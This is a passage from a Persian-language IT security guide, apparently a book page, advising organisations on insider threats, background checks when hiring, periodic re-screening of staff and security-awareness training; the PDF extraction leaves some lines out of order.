ﻛــﺮﺩﻳﻢ ﺩﺭ ﺑﻴــﺸﺘﺮ ﻣــﻮﺍﺭﺩ ﺍﻓــﺮﺍﺩﻱ ﻛــﻪ ﺑــﺼﻮﺭﺕ ﺁﮔﺎﻫﺎﻧــﻪ ﺩﺭ
ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﻧﻘﺶ ﺩﺍﺭﻧﺪ ﻛﺴﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﻛﺎﺭﻣﻨـﺪ
ﺧﻮﺩﺗﺎﻥ ﻣﻲﺑﺎﺷﻨﺪ )ﻳﺎ ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﺑﻮﺩﻩﺍﻧﺪ( :ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﻛﻨﺘﺮﻟﻬﺎ
ﻣﻄﻠﻌﻨﺪ ﻭ ﻣﻲ ﺩﺍﻧﻨﺪ ﭼﻪ ﺍﻃﻼﻋﺎﺗﻲ ﺑﺎ ﭼﻪ ﺍﺭﺯﺷﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ
ﻛﺪﺍﻡ ﻗﺴﻤﺖ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻼ ﻳـﻚ ﺳﻴـﺴﺘﻢ Unixﺭﺍ ﺭﺍﻫﺒـﺮﻱ
ﺷﻤﺎ ﺩﺭ ﻃﻮﻝ ﻣﺪﺗﻲ ﻛﻪ ﻣﺜ ﹰ
ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺍﻓﺮﺍﺩﻱ ﺍﺯ ﻫﺮ ﺩﻭ ﮔـﺮﻭﻩ ﻣﻮﺍﺟـﻪ ﺷـﻮﻳﺪ.
ﻛﻨﺘﺮﻟﻬﺎ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺴﻴﺎﺭ ﻣﺘﻌـﺪﺩ
ﻭ ﮔﻮﻧﺎﮔﻮﻥ ﻫﺴﺘﻨﺪ ﻭ ﺑﺤﺚ ﻭ ﺑﺮﺭﺳﻲ ﺗﻤﺎﻣﻲ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﻛﺘـﺎﺏ
ﻦ ﺁﻧﻬﺎ
ﻛﺎﻣﻞ ﻧﻴﺎﺯ ﺩﺍﺭﺩ؛ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺎ ﺗﻨﻬﺎ ﺑﻪ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﻣﻬﻤﺘﺮﻳ ﹺ
ﻣﻲ ﭘﺮﺩﺍﺯﻳﻢ .ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻧﻤﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﻭﻗـﻮﻉ
ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ ،ﺍﻣﺎ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ
ﻛﻪ ﺍﺯ ﺟﺎﻧﺐ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺧﻮﺩﺗـﺎﻥ ﻣﺘﻮﺟـﻪ ﺷـﺮﻛﺖ ﺷﻤﺎﺳـﺖ ﺭﺍ
ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻛﻨﻜﺎﺵ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺍﻋﺘﺒﺎﺭ ﻫﺮ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻭ
ﻣﺪﺭﻙ ﺗﺤﺼﻴﻠﻲ ﺭﺍ ﺑﺴﻨﺠﻴﺪ؛ ﺯﻳﺮﺍ ﺗﺎﻛﻨﻮﻥ ﺑﺴﻴﺎﺭ ﭘﻴﺶ ﺁﻣﺪﻩ ﻛـﻪ
ﺍﻓﺮﺍﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﻣﺪﺍﺭﻙ ﺗﺤﺼﻴﻠﻲ ﺧﻮﺩ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻩﻫـﺎﻱ ﻣﻌﺘﺒـﺮ
ﺳﺨﻦ ﺭﺍﻧﺪﻩﺍﻧﺪ ،ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺁﻥ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻫـﻴﭻ ﺳـﺎﺑﻘﻪﺍﻱ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ ﻛﻪ ﻧﺸﺎﻥ ﺩﻫﺪ ﺣﺘﻲ ﻳﻚ ﻭﺍﺣﺪ ﺩﺭﺳﻲ ﺗﻮﺳﻂ ﺁﻥ
ﺍﻓﺮﺍﺩ ﺑﺼﻮﺭﺕ ﻛﺎﻣﻞ ﮔﺬﺭﺍﻧﺪﻩ ﺷﺪﻩ ﺍﺳﺖ! ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﻧﻴﺰ ﻣﻤﻜﻦ
ﺍﺳﺖ ﻣﺪﺍﺭﻛﻲ ﺍﺭﺋﻪ ﻛﻨﻨﺪ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻳﻲ ﺑﺎﺷـﺪ ﻛـﻪ
ﺗﻨﻬﺎ ﺍﻧﺪﻛﻲ ﺑﺰﺭﮔﺘﺮ ﺍﺯ ﻳﻚ ﺩﻓﺘﺮ ﭘـﺴﺘﻲ ﻫـﺴﺘﻨﺪ! ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻴﺪ ﺍﺯ ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﻪ ﺍﺳﺘﺨﺪﺍﻡ ﺩﺭ ﺁﻣﺪﻥ ﺩﺭ ﻳﻚ ﺷﻐﻞ ﺑﻪ
ﺩﺭﻭﻍ ﻣﺘﻮﺳﻞ ﻣﻲﺷﻮﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺩﺭ ﻣـﺸﺎﻏﻞ ﺣـﺴﺎﺱ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﺮﺩ.
ﺗﺤﻘﻴﻘﺎﺕ ﻣﺘﻤﺮﻛﺰ
ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺗﺤﻘﻴﻘﺎﺕ ﺟـﺪﻱﺗـﺮﻱ ﺩﺭ
ﺭﺍﺑﻄﻪ ﺑﺎ ﺷﺨﺼﻴﺖ ﻭ ﭘﻴﺸﻴﻨﺔ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺑـﺎ ﺗﻮﺟـﻪ
ﺑﻪ ﺳﻄﺢ ﺷﻐﻠﻲ ﻛﻪ ﻗـﺮﺍﺭ ﺍﺳـﺖ ﻣﺘﻘﺎﺿـﻲ ﺩﺭ ﺁﻥ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﻭ
ﺩﺳﺘﺮﺳﻴﻬﺎﻳﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ ﺣـﺴﺎﺱ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺷﺎﻳﺪ ﺑﺨﻮﺍﻫﻴﺪ:
•
ﺍﺯ ﻛﻤﻚ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﻭﻳـﮋﺓ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﺑـﺮﺍﻱ
ﺑﺮﺭﺳﻲ ﭘﻴﺸﻴﻨﺔ ﺍﻓﺮﺍﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛
•
ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺳﻨﺪ ﻋﺪﻡ ﺳﻮﺀ ﭘﻴﺸﻴﻨﺔ ﺟﻨﺎﻳﻲ ﺑﺨﻮﺍﻫﻴﺪ؛
•
ﺳﻮﺍﺑﻖ ﺍﻋﺘﺒﺎﺭﻱ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴـﺪ ﺁﻳـﺎ
ﺑﺪﻫﻲﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺰﺭﮔﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ ﻛﻪ ﺍﺯ ﭘـﺲ ﺁﻥ ﺑـﺮ
ﻧﻴﺎﻣﺪﻩ ﺑﺎﺷﻨﺪ ﻳﺎ ﺧﻴﺮ .ﺍﮔﺮ ﻣﻮﺭﺩﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻳﺪ ﺩﺭﺑـﺎﺭﺓ ﺁﻥ
ﺑﺎ ﺧﻮﺩ ﻣﺘﻘﺎﺿـﻲ ﮔﻔﺘﮕـﻮ ﻛﻨﻴـﺪ .ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﻣﻘـﺮﻭﺽ
ﻫﺴﺘﻨﺪ ﻧﺒﺎﻳـﺪ ﺍﺯ ﻛـﺎﺭ ﻛـﺮﺩﻥ ﻣﺤـﺮﻭﻡ ﺷـﻮﻧﺪ؛ ﭼـﻮﻥ ﺩﺭ
ﺍﻳﻨﺼﻮﺭﺕ ﻫﻴﭽﮕﺎﻩ ﻗﺪﺭﺕ ﺑﺎﺯﭘﺮﺩﺍﺧﺖ ﺑـﺪﻫﻲﻫﺎﻳـﺸﺎﻥ ﺭﺍ
ﭘﻴﺪﺍ ﻧﺨﻮﺍﻫﻨﺪ ﻛﺮﺩ .ﺍﻟﺒﺘﻪ ﻧﺒﺎﻳـﺪ ﺍﺯ ﻧﻈـﺮ ﺩﻭﺭ ﺩﺍﺷـﺖ ﻛـﻪ
ﺍﺣﺘﻤﺎﻝ ﺑﺮﻭﺯ ﺭﻓﺘﺎﺭ ﻧﺎﺩﺭﺳﺖ ﻛﺎﺭﻱ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻧﻲﻛﻪ ﺗﺤـﺖ
ﻓﺸﺎﺭﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻫﺴﺘﻨﺪ ﺑﻴﺸﺘﺮ ﺍﺳﺖ.
•
ﺑﻌﻤﻞ ﺁﻭﺭﺩﻥ ﺁﺯﻣـﻮﻥ ﺩﺭﻭﻍ ﺳـﻨﺠﻲ ﺍﺯ ﻣﺘﻘﺎﺿـﻲ ﺭﺍ )ﺍﮔـﺮ
ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺍﺳﺘﺨﺪﺍﻡ
ﺑﺮﺭﺳﻲ ﭘﻴﺸﻴﻨﻪﻫﺎ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﻛﺎﺭﻛﻨﺎﻥ ﺟﺪﻳﺪ ﺭﺍ ﺍﺳﺘﺨﺪﺍﻡ ﻣﻲﻛﻨﻴﺪ ﭘﻴـﺸﻴﻨﺔ ﺁﻧﻬـﺎ ﺭﺍ
ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺧﻮﺍﺳـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ
ﻓﺮﻣﻬﺎﻱ ﺍﺳﺘﺨﺪﺍﻣﻲ ﺭﺍ ﭘﺮ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﭼﻪ؟ ﺣـﺪﺍﻗﻞ ﻛـﺎﺭ
ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﻣﻲ ﻣﻨﺎﺑﻌﻲ ﻛﻪ ﻫﺮ ﻣﺘﻘﺎﺿﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻧﺪﻥ
ﺧﻮﺩ ﻣﻌﺮﻓﻲ ﻛﺮﺩﻩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑـﻪ ﮔﺬﺷـﺘﺔ ﺍﻭ -ﺍﺯ
ﺟﻤﻠﻪ ﺩﻻﻳﻞ ﺗﺮﻙ ﻛﺎﺭﻫﺎﻱ ﻗﺒﻠـﻲﺍﺵ -ﭘـﻲ ﺑﺒﺮﻳـﺪ .ﻓﺮﺍﻣـﻮﺵ
ﻧﻜﻨﻴﺪ ﻛﻪ ﺩﺭ ﺑﺮﺭﺳﻲ ﺳﻮﺍﺑﻖ ،ﺗﺎﺭﻳﺦ ﺍﺳﺘﺨﺪﺍﻣﻬﺎ ﻭ ﺗﺮﻙ ﻛﺎﺭﻫﺎﻱ
ﻗﺒﻠﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺎﺯﻩﻫﺎﻱ ﺧﺎﻟﻲ ﻣﻴﺎﻥ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺩﻗـﺖ ﻣـﻮﺭﺩ
ﻗﺎﻧﻮﻥ ﺑﻪ ﺷﻤﺎ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ( ﺍﺯ ﻧﻈـﺮ ﺩﻭﺭ ﻧﺪﺍﺭﻳـﺪ .ﮔﺮﭼـﻪ
ﺁﺯﻣﻮﻧﻬﺎﻱ ﺩﺭﻭﻍﺳﻨﺠﻲ ﻫﻤﻴﺸﻪ ﺩﻗﻴﻖ ﻧﻴـﺴﺘﻨﺪ ،ﺍﻣـﺎ ﺍﮔـﺮ
ﻣﻮﻗﻌﻴــﺖ ﺷــﻐﻠﻲ ﺣــﺴﺎﺳﻲ ﺭﺍ ﺑــﺮﺍﻱ ﻣﺘﻘﺎﺿــﻲ ﺩﺭﻧﻈــﺮ
ﮔﺮﻓﺘﻪﺍﻳﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻔﻴﺪ ﺑﺎﺷﻨﺪ.
•
ﺍﺯ ﻣﺘﻘﺎﺿﻲ ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺩﺭ ﺷﻐﻞ ﻣﺮﺑﻮﻃﻪ ﻳﻚ
ﺿﻤﺎﻧﺘﻨﺎﻣﻪ ﺑﻴﺎﻭﺭﺩ .ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻧﺠﺎﻡ ﺗﻤﺎﻣﻲ ﺍﻳـﻦ ﻣﺮﺍﺣـﻞ
١٦١
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺑﺮﺍﻱ ﺍﺳﺘﺨﺪﺍﻡ ﻫﻤﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﻮﺻﻴﻪ ﻧﻤﻲﺷـﻮﺩ ،ﺍﻣـﺎ ﺩﺭ
ﻣﻮﺭﺩ ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺩﺭ ﭘﺴﺘﻬﺎﻳﻲ ﻛﺎﺭ ﻛﻨﻨﺪ ﻛﻪ
ﺩﺭ ﺁﻧﻬﺎ ﺑﻪ ﺳﻄﺢ ﺑﺎﻻﻳﻲ ﺍﺯ ﺍﻋﺘﻤﺎﺩ ﻧﻴﺎﺯ ﺍﺳـﺖ ﻭ ﺷـﺎﻏﻠﻴﻦ
ﻧﻴﺰ ﺍﺯ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻭﻳـﮋﻩ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﻣـﻲﺷـﻮﻧﺪ -ﻣﺜـﻞ
ﺟﺬﺏ ﻭ ﻳﺎ ﺍﺧﺮﺍﺝ ﻛﺎﺭﻛﻨﺎﻥ -ﺑﺎﻳﺪ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﺑﻴـﺸﺘﺮﻱ
ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ .ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﻛﻨﻴﻢ ﺑﻪ ﻣﺘﻘﺎﺿﻲ ﺍﻃﻼﻉ ﺩﻫﻴﺪ
ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﭼﻨﻴﻦ ﺑﺮﺭﺳﻴﻬﺎﻳﻲ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭ ﺑـﺮﺍﻱ
ﺍﻳﻨﻜﺎﺭ ﺭﺿﺎﻳﺖ ﺍﻭ ﺭﺍ ﻧﻴﺰ ﺟﻠﺐ ﻛﻨﻴﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﺮﭼﻨﺪ
ﺿﺮﻭﺭﻱ ﻧﻴﺴﺖ ﻭﻟﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻧﺠـﺎﻡ ﺑﺮﺭﺳـﻴﻬﺎ
ﺭﺍﺣﺖﺗﺮ ﺷـﻮﺩ ﻭ ﻣﺘﻘﺎﺿـﻲ ﻣﺘﻮﺟـﻪ ﺑﺎﺷـﺪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ
ﺍﺳﺘﺨﺪﺍﻡ ﻭﻱ ﻣﺤﺘﺎﻁ ﻭ ﺟـﺪﻱ ﻫـﺴﺘﻴﺪ .ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ
ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻪ ﺍﺟﺎﺯﺓ ﺻﺮﻳﺢ ﻣﺘﻘﺎﺿﻲ ﻧﻴـﺎﺯ
ﺩﺍﺭﻳﺪ.
ﺯﻣﺎﻧﻲ ﻛﻪ ﺁﺯﻣﻮﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩ ﻭ ﻣﺘﻘﺎﺿﻲ ﺭﺍ ﺍﺳـﺘﺨﺪﺍﻡ
ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺑﻌﻀﻲ ﺍﺯ ﺑﺮﺭﺳﻴﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﻣﺠﺪﺩﹰﺍ ﺍﻧﺠـﺎﻡ
ﺩﻫﻴﺪ .ﭘﺲ ﺍﺯ ﺁﻥ ﺑﺎﻳﺪ ﻧﺘﺎﻳﺞ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻓﻌﻠﻲ ﻭ ﻗﺒﻠﻲ ﺭﺍ ﺑـﺎ ﻫـﻢ
ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﺪ ﺗﺎ ﺑﻪ ﺗﻐﻴﻴـﺮﺍﺕ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﭘـﻲ ﺑﺒﺮﻳـﺪ .ﺑﻌـﻀﻲ
ﺗﻐﻴﻴﺮﺍﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻴﺎﺯ ﺑﻪ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻋﻤﻴﻘﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﻛﺎﺭﻣﻨﺪﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣـﺴﺌﻮﻝ ﺳﻴـﺴﺘﻢ
ﺣــﺴﺎﺑﺪﺍﺭﻱ ﺷــﻤﺎ -ﺍﺯ ﺟﻤﻠــﻪ ﺗﻬﻴــﺔ ﭼﻜﻬــﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺮﺍﻱ
ﺑــﺴﺘﺎﻧﻜﺎﺭﺍﻥ -ﺑﺎﺷــﺪ ،ﺷــﺎﻳﺪ ﻻﺯﻡ ﺑﺎﺷــﺪ ﺍﻋﺘﺒــﺎﺭ ﻣﻮﺟــﻮﺩ ﺩﺭ
ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺍﻭ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺎﺯﻩﻫـﺎﻱ ﻛﻮﺗـﺎﻩ ﺯﻣـﺎﻧﻲ ﺑﺮﺭﺳـﻲ
ﻛﻨﻴﺪ .ﺍﮔﺮ ﺑﺮﺭﺳﻲ ﻭ ﺗﺤﻘﻴﻖ ﻣﺠﺪﺩ ﺷﻤﺎ ﻫﺮ ﺩﻭ ﺳﺎﻝ ﻳﻜﺒﺎﺭ ﺍﻧﺠﺎﻡ
ﺷﻮﺩ ﻭ ﺩﺭﻳﺎﺑﻴﺪ ﻛﻪ ﺭﻓﺘﺎﺭ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧـﺎﺭﺝ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﺗﻌﻴﻴﻦﺷﺪﻩ ﺍﺳﺖ ،ﻋﻠﻲﺍﻟﻘﺎﻋﺪﻩ ﺗﺼﻤﻴﻢ ﺧﻮﺍﻫﻴﺪ ﮔﺮﻓﺖ ﻛـﻪ ﺩﺭ ﺁﻥ
ﻣﻮﺭﺩ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺑﻌﻤﻞ ﺑﻴﺎﻭﺭﻳﺪ.
ﺁﻣﻮﺯﺵ ﺍﻭﻟﻴﻪ
ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷـﻤﺎ ﺩﺭ ﻣـﻮﺭﺩ ﻳـﻚ ﻛﺎﺭﻣﻨـﺪ ﻧﺒﺎﻳـﺪ ﭘـﺲ ﺍﺯ
ﺍﺳﺘﺨﺪﺍﻡ ﺍﻭ ﻣﺘﻮﻗﻒ ﺷﻮﺩ .ﻫﺮ ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﻪ ﺣﺘﻤـﹰﺎ ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﺁﻣﻮﺯﺷﻬﺎﻱ ﺯﻳﺮﺑﻨﺎﻳﻲ ﺑﺒﻴﻨﺪ .ﺍﻳﻦ ﺁﻣـﻮﺯﺵ ﺩﺭ
ﺣﺎﻟﺖ ﺣﺪﺍﻗﻠﻲ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺘﺨﺎﺏ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﺭﻣﺰ ﻋﺒﻮﺭ ،ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎ )ﺍﻳﻨﻜـﻪ
ﭼﻪ ﻛﺴﻲ ﻣﺠﺎﺯ ﺍﺳﺖ ﺑﻪ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺘﺼﻞ ﺷﻮﺩ ﻭ ﭼﮕﻮﻧﻪ( ،ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﻪ
ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﻧﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ،ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﺗﻤـﺎﺱ
ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺎ ﺷــﺮﻛﺖ )ﺍﺯ ﻃﺮﻳــﻖ ﺗﻠﻔــﻦ( ،ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﻓــﺸﺎﻱ
ﺁﻣﻮﺯﺵ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺍﺳﻨﺎﺩ ﻧﻮﺷﺘﺎﺭﻱ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ
ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪ ﺷﻮﺩ ﻭ ﻣﺒﺎﺣﺜﻲ ﭼﻮﻥ ﻛـﺎﺭﺑﺮﺩ ﺩﺭﺳـﺖ ﻭ ﻧﺎﺩﺭﺳـﺖ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ،ﺍﺳﺘﻔﺎﺩﺓ ﺷﺨﺼﻲ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ )ﺩﺭ
ﺧﻼﻝ ﻭ ﺑﻌﺪ ﺍﺯ ﺍﺗﻤﺎﻡ ﺳـﺎﻋﺎﺕ ﻛـﺎﺭ( ،ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻣﺎﻟﻜﻴـﺖ ﻭ ﻛـﺎﺭﺑﺮﺩ
ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﻭﺭﻭﺩ ﻭ ﺧــﺮﻭﺝ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺩﺭ ﺑﺮ ﮔﻴﺮﺩ .ﻣﺠﺎﺯﺍﺗﻬﺎﻱ ﻧﻘـﺾ ﻣﻘـﺮﺭﺍﺕ
ﻧﻴﺰ ﺑﺎﻳﺪ ﻫﻨﮕﺎﻡ ﺁﻣﻮﺯﺵ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﻮﻧﺪ.
ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﻓﺮﻣﻬﺎﻳﻲ ﻣﺒﻨﻲ ﺑﺮ ﺁﮔﺎﻫﻲ ﺍﺯ ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﭘﺬﻳﺮﻓﺘﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺁﻥ ﺍﻣﻀﺎ ﻛﻨﻨﺪ .ﺍﻳﻦ ﻓﺮﻣﻬـﺎ ﺑﺎﻳـﺪ ﺳـﺎﻟﻬﺎ
ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ ﺗﺎ ﺍﮔﺮ ﺑﻌﺪﻫﺎ ﺍﻳﻦ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﺷﺪ ﻛـﻪ ﺁﻳـﺎ ﺑـﻪ
ﻛﺎﺭﻣﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﭽﻪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻗﺒﺎﻝ ﻭﻱ ﻣﺠﺎﺯ ﺑﻪ ﺍﻧﺠـﺎﻡ
ﺁﻥ ﺍﺳﺖ ﺁﮔﺎﻫﻲ ﻗﺒﻠﻲ ﺩﺍﺩﻩ ﺷﺪﻩ ﻳﺎ ﺧﻴـﺮ ،ﺑﺘـﻮﺍﻥ ﻳـﻚ ﻣـﺪﺭﻙ
ﺍﺛﺒﺎﺕﻛﻨﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻛﺮﺩ.
ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻣﺪﺍﻭﻡ
ﻛﺎﺭﺑﺮﺍﻥ ﻻﺯﻡ ﺍﺳﺖ ﺑﻄﻮﺭ ﻣﺘﻨﺎﻭﺏ ﺍﻃﻼﻋﺎﺕ ﺗﺎﺯﻩﺍﻱ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ
